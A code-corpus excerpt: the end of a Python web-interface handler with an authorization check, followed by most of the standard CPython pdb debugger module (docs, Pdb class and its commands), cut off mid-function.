{'CFG_SITE_URL' : CFG_SITE_URL}
# return of all the updated informations to be display
return page(title = 'Remote server infos',
body = body,
navtrail = navtrail,
#uid = uid,
lastupdated = __lastupdated__,
req = req,
language = argd['ln'],
errors = '',
warnings = '',
navmenuid = "yourmessages")
def check_credential(self, req):
'''
This method check if the user has the right to get into this
function
'''
auth_code, auth_message = acc_authorize_action(req, 'runbibswordclient')
return (auth_code, auth_message)
index = __call__
|
kemalakyol48/python-for-android
|
refs/heads/master
|
python3-alpha/python3-src/Lib/pdb.py
|
47
|
#! /usr/bin/env python3
"""
The Python Debugger Pdb
=======================
To use the debugger in its simplest form:
>>> import pdb
>>> pdb.run('<a statement>')
The debugger's prompt is '(Pdb) '. This will stop in the first
function call in <a statement>.
Alternatively, if a statement terminated with an unhandled exception,
you can use pdb's post-mortem facility to inspect the contents of the
traceback:
>>> <a statement>
<exception traceback>
>>> import pdb
>>> pdb.pm()
The commands recognized by the debugger are listed in the next
section. Most can be abbreviated as indicated; e.g., h(elp) means
that 'help' can be typed as 'h' or 'help' (but not as 'he' or 'hel',
nor as 'H' or 'Help' or 'HELP'). Optional arguments are enclosed in
square brackets. Alternatives in the command syntax are separated
by a vertical bar (|).
A blank line repeats the previous command literally, except for
'list', where it lists the next 11 lines.
Commands that the debugger doesn't recognize are assumed to be Python
statements and are executed in the context of the program being
debugged. Python statements can also be prefixed with an exclamation
point ('!'). This is a powerful way to inspect the program being
debugged; it is even possible to change variables or call functions.
When an exception occurs in such a statement, the exception name is
printed but the debugger's state is not changed.
The debugger supports aliases, which can save typing. And aliases can
have parameters (see the alias help entry) which allows one a certain
level of adaptability to the context under examination.
Multiple commands may be entered on a single line, separated by the
pair ';;'. No intelligence is applied to separating the commands; the
input is split at the first ';;', even if it is in the middle of a
quoted string.
If a file ".pdbrc" exists in your home directory or in the current
directory, it is read in and executed as if it had been typed at the
debugger prompt. This is particularly useful for aliases. If both
files exist, the one in the home directory is read first and aliases
defined there can be overriden by the local file.
Aside from aliases, the debugger is not directly programmable; but it
is implemented as a class from which you can derive your own debugger
class, which you can make as fancy as you like.
Debugger commands
=================
"""
# NOTE: the actual command documentation is collected from docstrings of the
# commands and is appended to __doc__ after the class has been defined.
import os
import re
import sys
import cmd
import bdb
import dis
import code
import pprint
import signal
import inspect
import traceback
import linecache
class Restart(Exception):
"""Causes a debugger to be restarted for the debugged python program."""
pass
__all__ = ["run", "pm", "Pdb", "runeval", "runctx", "runcall", "set_trace",
"post_mortem", "help"]
def find_function(funcname, filename):
cre = re.compile(r'def\s+%s\s*[(]' % re.escape(funcname))
try:
fp = open(filename)
except IOError:
return None
# consumer of this info expects the first line to be 1
lineno = 1
answer = None
while True:
line = fp.readline()
if line == '':
break
if cre.match(line):
answer = funcname, filename, lineno
break
lineno += 1
fp.close()
return answer
def getsourcelines(obj):
lines, lineno = inspect.findsource(obj)
if inspect.isframe(obj) and obj.f_globals is obj.f_locals:
# must be a module frame: do not try to cut a block out of it
return lines, 1
elif inspect.ismodule(obj):
return lines, 1
return inspect.getblock(lines[lineno:]), lineno+1
def lasti2lineno(code, lasti):
linestarts = list(dis.findlinestarts(code))
linestarts.reverse()
for i, lineno in linestarts:
if lasti >= i:
return lineno
return 0
class _rstr(str):
"""String that doesn't quote its repr."""
def __repr__(self):
return self
# Interaction prompt line will separate file and call info from code
# text using value of line_prefix string. A newline and arrow may
# be to your liking. You can set it once pdb is imported using the
# command "pdb.line_prefix = '\n% '".
# line_prefix = ': ' # Use this to get the old situation back
line_prefix = '\n-> ' # Probably a better default
class Pdb(bdb.Bdb, cmd.Cmd):
def __init__(self, completekey='tab', stdin=None, stdout=None, skip=None,
nosigint=False):
bdb.Bdb.__init__(self, skip=skip)
cmd.Cmd.__init__(self, completekey, stdin, stdout)
if stdout:
self.use_rawinput = 0
self.prompt = '(Pdb) '
self.aliases = {}
self.displaying = {}
self.mainpyfile = ''
self._wait_for_mainpyfile = False
self.tb_lineno = {}
# Try to load readline if it exists
try:
import readline
except ImportError:
pass
self.allow_kbdint = False
self.nosigint = nosigint
# Read $HOME/.pdbrc and ./.pdbrc
self.rcLines = []
if 'HOME' in os.environ:
envHome = os.environ['HOME']
try:
with open(os.path.join(envHome, ".pdbrc")) as rcFile:
self.rcLines.extend(rcFile)
except IOError:
pass
try:
with open(".pdbrc") as rcFile:
self.rcLines.extend(rcFile)
except IOError:
pass
self.commands = {} # associates a command list to breakpoint numbers
self.commands_doprompt = {} # for each bp num, tells if the prompt
# must be disp. after execing the cmd list
self.commands_silent = {} # for each bp num, tells if the stack trace
# must be disp. after execing the cmd list
self.commands_defining = False # True while in the process of defining
# a command list
self.commands_bnum = None # The breakpoint number for which we are
# defining a list
def sigint_handler(self, signum, frame):
if self.allow_kbdint:
raise KeyboardInterrupt
self.message("\nProgram interrupted. (Use 'cont' to resume).")
self.set_step()
self.set_trace(frame)
# restore previous signal handler
signal.signal(signal.SIGINT, self._previous_sigint_handler)
def reset(self):
bdb.Bdb.reset(self)
self.forget()
def forget(self):
self.lineno = None
self.stack = []
self.curindex = 0
self.curframe = None
self.tb_lineno.clear()
def setup(self, f, tb):
self.forget()
self.stack, self.curindex = self.get_stack(f, tb)
while tb:
# when setting up post-mortem debugging with a traceback, save all
# the original line numbers to be displayed along the current line
# numbers (which can be different, e.g. due to finally clauses)
lineno = lasti2lineno(tb.tb_frame.f_code, tb.tb_lasti)
self.tb_lineno[tb.tb_frame] = lineno
tb = tb.tb_next
self.curframe = self.stack[self.curindex][0]
# The f_locals dictionary is updated from the actual frame
# locals whenever the .f_locals accessor is called, so we
# cache it here to ensure that modifications are not overwritten.
self.curframe_locals = self.curframe.f_locals
return self.execRcLines()
# Can be executed earlier than 'setup' if desired
def execRcLines(self):
if not self.rcLines:
return
# local copy because of recursion
rcLines = self.rcLines
rcLines.reverse()
# execute every line only once
self.rcLines = []
while rcLines:
line = rcLines.pop().strip()
if line and line[0] != '#':
if self.onecmd(line):
# if onecmd returns True, the command wants to exit
# from the interaction, save leftover rc lines
# to execute before next interaction
self.rcLines += reversed(rcLines)
return True
# Override Bdb methods
def user_call(self, frame, argument_list):
"""This method is called when there is the remote possibility
that we ever need to stop in this function."""
if self._wait_for_mainpyfile:
return
if self.stop_here(frame):
self.message('--Call--')
self.interaction(frame, None)
def user_line(self, frame):
"""This function is called when we stop or break at this line."""
if self._wait_for_mainpyfile:
if (self.mainpyfile != self.canonic(frame.f_code.co_filename)
or frame.f_lineno <= 0):
return
self._wait_for_mainpyfile = False
if self.bp_commands(frame):
self.interaction(frame, None)
def bp_commands(self, frame):
"""Call every command that was set for the current active breakpoint
(if there is one).
Returns True if the normal interaction function must be called,
False otherwise."""
# self.currentbp is set in bdb in Bdb.break_here if a breakpoint was hit
if getattr(self, "currentbp", False) and \
self.currentbp in self.commands:
currentbp = self.currentbp
self.currentbp = 0
lastcmd_back = self.lastcmd
self.setup(frame, None)
for line in self.commands[currentbp]:
self.onecmd(line)
self.lastcmd = lastcmd_back
if not self.commands_silent[currentbp]:
self.print_stack_entry(self.stack[self.curindex])
if self.commands_doprompt[currentbp]:
self._cmdloop()
self.forget()
return
return 1
def user_return(self, frame, return_value):
"""This function is called when a return trap is set here."""
if self._wait_for_mainpyfile:
return
frame.f_locals['__return__'] = return_value
self.message('--Return--')
self.interaction(frame, None)
def user_exception(self, frame, exc_info):
"""This function is called if an exception occurs,
but only if we are to stop at or just below this level."""
if self._wait_for_mainpyfile:
return
exc_type, exc_value, exc_traceback = exc_info
frame.f_locals['__exception__'] = exc_type, exc_value
self.message(traceback.format_exception_only(exc_type,
exc_value)[-1].strip())
self.interaction(frame, exc_traceback)
# General interaction function
def _cmdloop(self):
while True:
try:
# keyboard interrupts allow for an easy way to cancel
# the current command, so allow them during interactive input
self.allow_kbdint = True
self.cmdloop()
self.allow_kbdint = False
break
except KeyboardInterrupt:
self.message('--KeyboardInterrupt--')
# Called before loop, handles display expressions
def preloop(self):
displaying = self.displaying.get(self.curframe)
if displaying:
for expr, oldvalue in displaying.items():
newvalue = self._getval_except(expr)
# check for identity first; this prevents custom __eq__ to
# be called at every loop, and also prevents instances whose
# fields are changed to be displayed
if newvalue is not oldvalue and newvalue != oldvalue:
displaying[expr] = newvalue
self.message('display %s: %r [old: %r]' %
(expr, newvalue, oldvalue))
def interaction(self, frame, traceback):
if self.setup(frame, traceback):
# no interaction desired at this time (happens if .pdbrc contains
# a command like "continue")
self.forget()
return
self.print_stack_entry(self.stack[self.curindex])
self._cmdloop()
self.forget()
def displayhook(self, obj):
"""Custom displayhook for the exec in default(), which prevents
assignment of the _ variable in the builtins.
"""
# reproduce the behavior of the standard displayhook, not printing None
if obj is not None:
self.message(repr(obj))
def default(self, line):
if line[:1] == '!': line = line[1:]
locals = self.curframe_locals
globals = self.curframe.f_globals
try:
code = compile(line + '\n', '<stdin>', 'single')
save_stdout = sys.stdout
save_stdin = sys.stdin
save_displayhook = sys.displayhook
try:
sys.stdin = self.stdin
sys.stdout = self.stdout
sys.displayhook = self.displayhook
exec(code, globals, locals)
finally:
sys.stdout = save_stdout
sys.stdin = save_stdin
sys.displayhook = save_displayhook
except:
exc_info = sys.exc_info()[:2]
self.error(traceback.format_exception_only(*exc_info)[-1].strip())
def precmd(self, line):
"""Handle alias expansion and ';;' separator."""
if not line.strip():
return line
args = line.split()
while args[0] in self.aliases:
line = self.aliases[args[0]]
ii = 1
for tmpArg in args[1:]:
line = line.replace("%" + str(ii),
tmpArg)
ii += 1
line = line.replace("%*", ' '.join(args[1:]))
args = line.split()
# split into ';;' separated commands
# unless it's an alias command
if args[0] != 'alias':
marker = line.find(';;')
if marker >= 0:
# queue up everything after marker
next = line[marker+2:].lstrip()
self.cmdqueue.append(next)
line = line[:marker].rstrip()
return line
def onecmd(self, line):
"""Interpret the argument as though it had been typed in response
to the prompt.
Checks whether this line is typed at the normal prompt or in
a breakpoint command list definition.
"""
if not self.commands_defining:
return cmd.Cmd.onecmd(self, line)
else:
return self.handle_command_def(line)
def handle_command_def(self, line):
"""Handles one command line during command list definition."""
cmd, arg, line = self.parseline(line)
if not cmd:
return
if cmd == 'silent':
self.commands_silent[self.commands_bnum] = True
return # continue to handle other cmd def in the cmd list
elif cmd == 'end':
self.cmdqueue = []
return 1 # end of cmd list
cmdlist = self.commands[self.commands_bnum]
if arg:
cmdlist.append(cmd+' '+arg)
else:
cmdlist.append(cmd)
# Determine if we must stop
try:
func = getattr(self, 'do_' + cmd)
except AttributeError:
func = self.default
# one of the resuming commands
if func.__name__ in self.commands_resuming:
self.commands_doprompt[self.commands_bnum] = False
self.cmdqueue = []
return 1
return
# interface abstraction functions
def message(self, msg):
print(msg, file=self.stdout)
def error(self, msg):
print('***', msg, file=self.stdout)
# Command definitions, called by cmdloop()
# The argument is the remaining string on the command line
# Return true to exit from the command loop
def do_commands(self, arg):
"""commands [bpnumber]
(com) ...
(com) end
(Pdb)
Specify a list of commands for breakpoint number bpnumber.
The commands themselves are entered on the following lines.
Type a line containing just 'end' to terminate the commands.
The commands are executed when the breakpoint is hit.
To remove all commands from a breakpoint, type commands and
follow it immediately with end; that is, give no commands.
With no bpnumber argument, commands refers to the last
breakpoint set.
You can use breakpoint commands to start your program up
again. Simply use the continue command, or step, or any other
command that resumes execution.
Specifying any command resuming execution (currently continue,
step, next, return, jump, quit and their abbreviations)
terminates the command list (as if that command was
immediately followed by end). This is because any time you
resume execution (even with a simple next or step), you may
encounter another breakpoint -- which could have its own
command list, leading to ambiguities about which list to
execute.
If you use the 'silent' command in the command list, the usual
message about stopping at a breakpoint is not printed. This
may be desirable for breakpoints that are to print a specific
message and then continue. If none of the other commands
print anything, you will see no sign that the breakpoint was
reached.
"""
if not arg:
bnum = len(bdb.Breakpoint.bpbynumber) - 1
else:
try:
bnum = int(arg)
except:
self.error("Usage: commands [bnum]\n ...\n end")
return
self.commands_bnum = bnum
# Save old definitions for the case of a keyboard interrupt.
if bnum in self.commands:
old_command_defs = (self.commands[bnum],
self.commands_doprompt[bnum],
self.commands_silent[bnum])
else:
old_command_defs = None
self.commands[bnum] = []
self.commands_doprompt[bnum] = True
self.commands_silent[bnum] = False
prompt_back = self.prompt
self.prompt = '(com) '
self.commands_defining = True
try:
self.cmdloop()
except KeyboardInterrupt:
# Restore old definitions.
if old_command_defs:
self.commands[bnum] = old_command_defs[0]
self.commands_doprompt[bnum] = old_command_defs[1]
self.commands_silent[bnum] = old_command_defs[2]
else:
del self.commands[bnum]
del self.commands_doprompt[bnum]
del self.commands_silent[bnum]
self.error('command definition aborted, old commands restored')
finally:
self.commands_defining = False
self.prompt = prompt_back
def do_break(self, arg, temporary = 0):
"""b(reak) [ ([filename:]lineno | function) [, condition] ]
Without argument, list all breaks.
With a line number argument, set a break at this line in the
current file. With a function name, set a break at the first
executable line of that function. If a second argument is
present, it is a string specifying an expression which must
evaluate to true before the breakpoint is honored.
The line number may be prefixed with a filename and a colon,
to specify a breakpoint in another file (probably one that
hasn't been loaded yet). The file is searched for on
sys.path; the .py suffix may be omitted.
"""
if not arg:
if self.breaks: # There's at least one
self.message("Num Type Disp Enb Where")
for bp in bdb.Breakpoint.bpbynumber:
if bp:
self.message(bp.bpformat())
return
# parse arguments; comma has lowest precedence
# and cannot occur in filename
filename = None
lineno = None
cond = None
comma = arg.find(',')
if comma > 0:
# parse stuff after comma: "condition"
cond = arg[comma+1:].lstrip()
arg = arg[:comma].rstrip()
# parse stuff before comma: [filename:]lineno | function
colon = arg.rfind(':')
funcname = None
if colon >= 0:
filename = arg[:colon].rstrip()
f = self.lookupmodule(filename)
if not f:
self.error('%r not found from sys.path' % filename)
return
else:
filename = f
arg = arg[colon+1:].lstrip()
try:
lineno = int(arg)
except ValueError:
self.error('Bad lineno: %s' % arg)
return
else:
# no colon; can be lineno or function
try:
lineno = int(arg)
except ValueError:
try:
func = eval(arg,
self.curframe.f_globals,
self.curframe_locals)
except:
func = arg
try:
if hasattr(func, '__func__'):
func = func.__func__
code = func.__code__
#use co_name to identify the bkpt (function names
#could be aliased, but co_name is invariant)
funcname = code.co_name
lineno = code.co_firstlineno
filename = code.co_filename
except:
# last thing to try
(ok, filename, ln) = self.lineinfo(arg)
if not ok:
self.error('The specified object %r is not a function '
'or was not found along sys.path.' % arg)
return
funcname = ok # ok contains a function name
lineno = int(ln)
if not filename:
filename = self.defaultFile()
# Check for reasonable breakpoint
line = self.checkline(filename, lineno)
if line:
# now set the break point
err = self.set_break(filename, line, temporary, cond, funcname)
if err:
self.error(err, file=self.stdout)
else:
bp = self.get_breaks(filename, line)[-1]
self.message("Breakpoint %d at %s:%d" %
(bp.number, bp.file, bp.line))
# To be overridden in derived debuggers
def defaultFile(self):
"""Produce a reasonable default."""
filename = self.curframe.f_code.co_filename
if filename == '<string>' and self.mainpyfile:
filename = self.mainpyfile
return filename
do_b = do_break
def do_tbreak(self, arg):
"""tbreak [ ([filename:]lineno | function) [, condition] ]
Same arguments as break, but sets a temporary breakpoint: it
is automatically deleted when first hit.
"""
self.do_break(arg, 1)
def lineinfo(self, identifier):
failed = (None, None, None)
# Input is identifier, may be in single quotes
idstring = identifier.split("'")
if len(idstring) == 1:
# not in single quotes
id = idstring[0].strip()
elif len(idstring) == 3:
# quoted
id = idstring[1].strip()
else:
return failed
if id == '': return failed
parts = id.split('.')
# Protection for derived debuggers
if parts[0] == 'self':
del parts[0]
if len(parts) == 0:
return failed
# Best first guess at file to look at
fname = self.defaultFile()
if len(parts) == 1:
item = parts[0]
else:
# More than one part.
# First is module, second is method/class
f = self.lookupmodule(parts[0])
if f:
fname = f
item = parts[1]
answer = find_function(item, fname)
return answer or failed
def checkline(self, filename, lineno):
"""Check whether specified line seems to be executable.
Return `lineno` if it is, 0 if not (e.g. a docstring, comment, blank
line or EOF). Warning: testing is not comprehensive.
"""
# this method should be callable before starting debugging, so default
# to "no globals" if there is no current frame
globs = self.curframe.f_globals if hasattr(self, 'curframe') else None
line = linecache.getline(filename, lineno, globs)
if not line:
self.message('End of file')
return 0
line = line.strip()
# Don't allow setting breakpoint at a blank line
if (not line or (line[0] == '#') or
(line[:3] == '"""') or line[:3] == "'''"):
self.error('Blank or comment')
return 0
return lineno
def do_enable(self, arg):
"""enable bpnumber [bpnumber ...]
Enables the breakpoints given as a space separated list of
breakpoint numbers.
"""
args = arg.split()
for i in args:
try:
bp = self.get_bpbynumber(i)
except ValueError as err:
self.error(err)
else:
bp.enable()
self.message('Enabled %s' % bp)
def do_disable(self, arg):
"""disable bpnumber [bpnumber ...]
Disables the breakpoints given as a space separated list of
breakpoint numbers. Disabling a breakpoint means it cannot
cause the program to stop execution, but unlike clearing a
breakpoint, it remains in the list of breakpoints and can be
(re-)enabled.
"""
args = arg.split()
for i in args:
try:
bp = self.get_bpbynumber(i)
except ValueError as err:
self.error(err)
else:
bp.disable()
self.message('Disabled %s' % bp)
def do_condition(self, arg):
"""condition bpnumber [condition]
Set a new condition for the breakpoint, an expression which
must evaluate to true before the breakpoint is honored. If
condition is absent, any existing condition is removed; i.e.,
the breakpoint is made unconditional.
"""
args = arg.split(' ', 1)
try:
cond = args[1]
except IndexError:
cond = None
try:
bp = self.get_bpbynumber(args[0].strip())
except ValueError as err:
self.error(err)
else:
bp.cond = cond
if not cond:
self.message('Breakpoint %d is now unconditional.' % bp.number)
else:
self.message('New condition set for breakpoint %d.' % bp.number)
def do_ignore(self, arg):
"""ignore bpnumber [count]
Set the ignore count for the given breakpoint number. If
count is omitted, the ignore count is set to 0. A breakpoint
becomes active when the ignore count is zero. When non-zero,
the count is decremented each time the breakpoint is reached
and the breakpoint is not disabled and any associated
condition evaluates to true.
"""
args = arg.split()
try:
count = int(args[1].strip())
except:
count = 0
try:
bp = self.get_bpbynumber(args[0].strip())
except ValueError as err:
self.error(err)
else:
bp.ignore = count
if count > 0:
if count > 1:
countstr = '%d crossings' % count
else:
countstr = '1 crossing'
self.message('Will ignore next %s of breakpoint %d.' %
(countstr, bp.number))
else:
self.message('Will stop next time breakpoint %d is reached.'
% bp.number)
def do_clear(self, arg):
"""cl(ear) filename:lineno\ncl(ear) [bpnumber [bpnumber...]]
With a space separated list of breakpoint numbers, clear
those breakpoints. Without argument, clear all breaks (but
first ask confirmation). With a filename:lineno argument,
clear all breaks at that line in that file.
"""
if not arg:
try:
reply = input('Clear all breaks? ')
except EOFError:
reply = 'no'
reply = reply.strip().lower()
if reply in ('y', 'yes'):
bplist = [bp for bp in bdb.Breakpoint.bpbynumber if bp]
self.clear_all_breaks()
for bp in bplist:
self.message('Deleted %s' % bp)
return
if ':' in arg:
# Make sure it works for "clear C:\foo\bar.py:12"
i = arg.rfind(':')
filename = arg[:i]
arg = arg[i+1:]
try:
lineno = int(arg)
except ValueError:
err = "Invalid line number (%s)" % arg
else:
bplist = self.get_breaks(filename, lineno)
err = self.clear_break(filename, lineno)
if err:
self.error(err)
else:
for bp in bplist:
self.message('Deleted %s' % bp)
return
numberlist = arg.split()
for i in numberlist:
try:
bp = self.get_bpbynumber(i)
except ValueError as err:
self.error(err)
else:
self.clear_bpbynumber(i)
self.message('Deleted %s' % bp)
do_cl = do_clear # 'c' is already an abbreviation for 'continue'
def do_where(self, arg):
"""w(here)
Print a stack trace, with the most recent frame at the bottom.
An arrow indicates the "current frame", which determines the
context of most commands. 'bt' is an alias for this command.
"""
self.print_stack_trace()
do_w = do_where
do_bt = do_where
def _select_frame(self, number):
assert 0 <= number < len(self.stack)
self.curindex = number
self.curframe = self.stack[self.curindex][0]
self.curframe_locals = self.curframe.f_locals
self.print_stack_entry(self.stack[self.curindex])
self.lineno = None
def do_up(self, arg):
"""u(p) [count]
Move the current frame count (default one) levels up in the
stack trace (to an older frame).
"""
if self.curindex == 0:
self.error('Oldest frame')
return
try:
count = int(arg or 1)
except ValueError:
self.error('Invalid frame count (%s)' % arg)
return
if count < 0:
newframe = 0
else:
newframe = max(0, self.curindex - count)
self._select_frame(newframe)
do_u = do_up
def do_down(self, arg):
"""d(own) [count]
Move the current frame count (default one) levels down in the
stack trace (to a newer frame).
"""
if self.curindex + 1 == len(self.stack):
self.error('Newest frame')
return
try:
count = int(arg or 1)
except ValueError:
self.error('Invalid frame count (%s)' % arg)
return
if count < 0:
newframe = len(self.stack) - 1
else:
newframe = min(len(self.stack) - 1, self.curindex + count)
self._select_frame(newframe)
do_d = do_down
def do_until(self, arg):
"""unt(il) [lineno]
Without argument, continue execution until the line with a
number greater than the current one is reached. With a line
number, continue execution until a line with a number greater
or equal to that is reached. In both cases, also stop when
the current frame returns.
"""
if arg:
try:
lineno = int(arg)
except ValueError:
self.error('Error in argument: %r' % arg)
return
if lineno <= self.curframe.f_lineno:
self.error('"until" line number is smaller than current '
'line number')
return
else:
lineno = None
self.set_until(self.curframe, lineno)
return 1
do_unt = do_until
def do_step(self, arg):
"""s(tep)
Execute the current line, stop at the first possible occasion
(either in a function that is called or in the current
function).
"""
self.set_step()
return 1
do_s = do_step
def do_next(self, arg):
"""n(ext)
Continue execution until the next line in the current function
is reached or it returns.
"""
self.set_next(self.curframe)
return 1
do_n = do_next
def do_run(self, arg):
"""run [args...]
Restart the debugged python program. If a string is supplied
it is splitted with "shlex", and the result is used as the new
sys.argv. History, breakpoints, actions and debugger options
are preserved. "restart" is an alias for "run".
"""
if arg:
import shlex
argv0 = sys.argv[0:1]
sys.argv = shlex.split(arg)
sys.argv[:0] = argv0
# this is caught in the main debugger loop
raise Restart
do_restart = do_run
def do_return(self, arg):
"""r(eturn)
Continue execution until the current function returns.
"""
self.set_return(self.curframe)
return 1
do_r = do_return
def do_continue(self, arg):
"""c(ont(inue))
Continue execution, only stop when a breakpoint is encountered.
"""
if not self.nosigint:
self._previous_sigint_handler = \
signal.signal(signal.SIGINT, self.sigint_handler)
self.set_continue()
return 1
do_c = do_cont = do_continue
def do_jump(self, arg):
"""j(ump) lineno
Set the next line that will be executed. Only available in
the bottom-most frame. This lets you jump back and execute
code again, or jump forward to skip code that you don't want
to run.
It should be noted that not all jumps are allowed -- for
instance it is not possible to jump into the middle of a
for loop or out of a finally clause.
"""
if self.curindex + 1 != len(self.stack):
self.error('You can only jump within the bottom frame')
return
try:
arg = int(arg)
except ValueError:
self.error("The 'jump' command requires a line number")
else:
try:
# Do the jump, fix up our copy of the stack, and display the
# new position
self.curframe.f_lineno = arg
self.stack[self.curindex] = self.stack[self.curindex][0], arg
self.print_stack_entry(self.stack[self.curindex])
except ValueError as e:
self.error('Jump failed: %s' % e)
do_j = do_jump
def do_debug(self, arg):
"""debug code
Enter a recursive debugger that steps through the code
argument (which is an arbitrary expression or statement to be
executed in the current environment).
"""
sys.settrace(None)
globals = self.curframe.f_globals
locals = self.curframe_locals
p = Pdb(self.completekey, self.stdin, self.stdout)
p.prompt = "(%s) " % self.prompt.strip()
self.message("ENTERING RECURSIVE DEBUGGER")
sys.call_tracing(p.run, (arg, globals, locals))
self.message("LEAVING RECURSIVE DEBUGGER")
sys.settrace(self.trace_dispatch)
self.lastcmd = p.lastcmd
def do_quit(self, arg):
"""q(uit)\nexit
Quit from the debugger. The program being executed is aborted.
"""
self._user_requested_quit = True
self.set_quit()
return 1
do_q = do_quit
do_exit = do_quit
def do_EOF(self, arg):
"""EOF
Handles the receipt of EOF as a command.
"""
self.message('')
self._user_requested_quit = True
self.set_quit()
return 1
def do_args(self, arg):
"""a(rgs)
Print the argument list of the current function.
"""
co = self.curframe.f_code
dict = self.curframe_locals
n = co.co_argcount
if co.co_flags & 4: n = n+1
if co.co_flags & 8: n = n+1
for i in range(n):
name = co.co_varnames[i]
if name in dict:
self.message('%s = %r' % (name, dict[name]))
else:
self.message('%s = *** undefined ***' % (name,))
do_a = do_args
def do_retval(self, arg):
"""retval
Print the return value for the last return of a function.
"""
if '__return__' in self.curframe_locals:
self.message(repr(self.curframe_locals['__return__']))
else:
self.error('Not yet returned!')
do_rv = do_retval
def _getval(self, arg):
try:
return eval(arg, self.curframe.f_globals, self.curframe_locals)
except:
exc_info = sys.exc_info()[:2]
self.error(traceback.format_exception_only(*exc_info)[-1].strip())
raise
def _getval_except(self, arg, frame=None):
try:
if frame is None:
return eval(arg, self.curframe.f_globals, self.curframe_locals)
else:
return eval(arg, frame.f_globals, frame.f_locals)
except:
exc_info = sys.exc_info()[:2]
err = traceback.format_exception_only(*exc_info)[-1].strip()
return _rstr('** raised %s **' % err)
def do_p(self, arg):
"""p(rint) expression
Print the value of the expression.
"""
try:
self.message(repr(self._getval(arg)))
except:
pass
# make "print" an alias of "p" since print isn't a Python statement anymore
do_print = do_p
def do_pp(self, arg):
"""pp expression
Pretty-print the value of the expression.
"""
try:
self.message(pprint.pformat(self._getval(arg)))
except:
pass
def do_list(self, arg):
"""l(ist) [first [,last] | .]
List source code for the current file. Without arguments,
list 11 lines around the current line or continue the previous
listing. With . as argument, list 11 lines around the current
line. With one argument, list 11 lines starting at that line.
With two arguments, list the given range; if the second
argument is less than the first, it is a count.
The current line in the current frame is indicated by "->".
If an exception is being debugged, the line where the
exception was originally raised or propagated is indicated by
">>", if it differs from the current line.
"""
self.lastcmd = 'list'
last = None
if arg and arg != '.':
try:
if ',' in arg:
first, last = arg.split(',')
first = int(first.strip())
last = int(last.strip())
if last < first:
# assume it's a count
last = first + last
else:
first = int(arg.strip())
first = max(1, first - 5)
except ValueError:
self.error('Error in argument: %r' % arg)
return
elif self.lineno is None or arg == '.':
first = max(1, self.curframe.f_lineno - 5)
else:
first = self.lineno + 1
if last is None:
last = first + 10
filename = self.curframe.f_code.co_filename
breaklist = self.get_file_breaks(filename)
try:
lines = linecache.getlines(filename, self.curframe.f_globals)
self._print_lines(lines[first-1:last], first, breaklist,
self.curframe)
self.lineno = min(last, len(lines))
if len(lines) < last:
self.message('[EOF]')
except KeyboardInterrupt:
pass
do_l = do_list
def do_longlist(self, arg):
"""longlist | ll
List the whole source code for the current function or frame.
"""
filename = self.curframe.f_code.co_filename
breaklist = self.get_file_breaks(filename)
try:
lines, lineno = getsourcelines(self.curframe)
except IOError as err:
self.error(err)
return
self._print_lines(lines, lineno, breaklist, self.curframe)
do_ll = do_longlist
def do_source(self, arg):
"""source expression
Try to get source code for the given object and display it.
"""
try:
obj = self._getval(arg)
except:
return
try:
lines, lineno = getsourcelines(obj)
except (IOError, TypeError) as err:
self.error(err)
return
self._print_lines(lines, lineno)
def _print_lines(self, lines, start, breaks=(), frame=None):
"""Print a range of lines."""
if frame:
current_lineno = frame.f_lineno
exc_lineno = self.tb_lineno.get(frame, -1)
else:
current_lineno = exc_lineno = -1
for lineno, line in enumerate(lines, start):
s = str(lineno).rjust(3)
if len(s) < 4:
s += ' '
if lineno in breaks:
s += 'B'
else:
s += ' '
if lineno == current_lineno:
s += '->'
elif lineno == exc_lineno:
s += '>>'
self.message(s + '\t' + line.rstrip())
def do_whatis(self, arg):
"""whatis arg
Print the type of the argument.
"""
try:
value = self._getval(arg)
except:
# _getval() already printed the error
return
code = None
# Is it a function?
try:
code = value.__code__
except Exception:
pass
if code:
self.message('Function %s' % code.co_name)
return
# Is it an instance method?
try:
code = value.__func__.__code__
except Exception:
pass
if code:
self.message('Method %s' % code.co_name)
return
# Is it a class?
if value.__class__ is type:
self.message('Class %s.%s' % (value.__module__, value.__name__))
return
# None of the above...
self.message(type(value))
def do_display(self, arg):
"""display [expression]
Display the value of the expression if it changed, each time execution
stops in the current frame.
Without expression, list all display expressions for the current frame.
"""
if not arg:
self.message('Currently displaying:')
for item in self.displaying.get(self.curframe, {}).items():
self.message('%s: %r' % item)
else:
val = self._getval_except(arg)
self.displaying.setdefault(self.curframe, {})[arg] = val
self.message('display %s: %r' % (arg, val))
def do_undisplay(self, arg):
"""undisplay [expression]
Do not display the expression any more in the current frame.
Without expression, clear all display expressions for the current frame.
"""
if arg:
try:
del self.displaying.get(self.curframe, {})[arg]
except KeyError:
self.error('not displaying %s' % arg)
else:
self.displaying.pop(self.curframe, None)
def do_interact(self, arg):
"""interact
Start an interative interpreter whose global namespace
contains all the (global and local) names found in the current scope.
"""
ns = self.curframe.f_globals.copy()
ns.update(self.curframe_locals)
code.interact("*interactive*", local=ns)
def do_alias(self, arg):
"""alias [name [command [parameter parameter ...] ]]
Create an alias called 'name' that executes 'command'. The
command must *not* be enclosed in quotes. Replaceable
parameters can be indicated by %1, %2, and so on, while %* is
replaced by all the parameters. If no command is given, the
current alias for name is shown. If no name is given, all
aliases are listed.
Aliases may be nested and can contain anything that can be
legally typed at the pdb prompt. Note! You *can* override
internal pdb commands with aliases! Those internal commands
are then hidden until the alias is removed. Aliasing is
recursively applied to the first word of the command line; all
other words in the line are left alone.
As an example, here are two useful aliases (especially when
placed in the .pdbrc file):
# Print instance variables (usage "pi classInst")
alias pi for k in %1.__dict__.keys(): print "%1.",k,"=",%1.__dict__[k]
# Print instance variables in self
alias ps pi self
"""
args = arg.split()
if len(args) == 0:
keys = sorted(self.aliases.keys())
for alias in keys:
self.message("%s = %s" % (alias, self.aliases[alias]))
return
if args[0] in self.aliases and len(args) == 1:
self.message("%s = %s" % (args[0], self.aliases[args[0]]))
else:
self.aliases[args[0]] = ' '.join(args[1:])
def do_unalias(self, arg):
"""unalias name
Delete the specified alias.
"""
args = arg.split()
if len(args) == 0: return
if args[0] in self.aliases:
del self.aliases[args[0]]
# List of all the commands making the program resume execution.
commands_resuming = ['do_continue', 'do_step', 'do_next', 'do_return',
'do_quit', 'do_jump']
# Print a traceback starting at the top stack frame.
# The most recently entered frame is printed last;
# this is different from dbx and gdb, but consistent with
# the Python interpreter's stack trace.
# It is also consistent with the up/down commands (which are
# compatible with dbx and gdb: up moves towards 'main()'
# and down moves towards the most recent stack frame).
def print_stack_trace(self):
try:
for frame_lineno in self.stack:
self.print_stack_entry(frame_lineno)
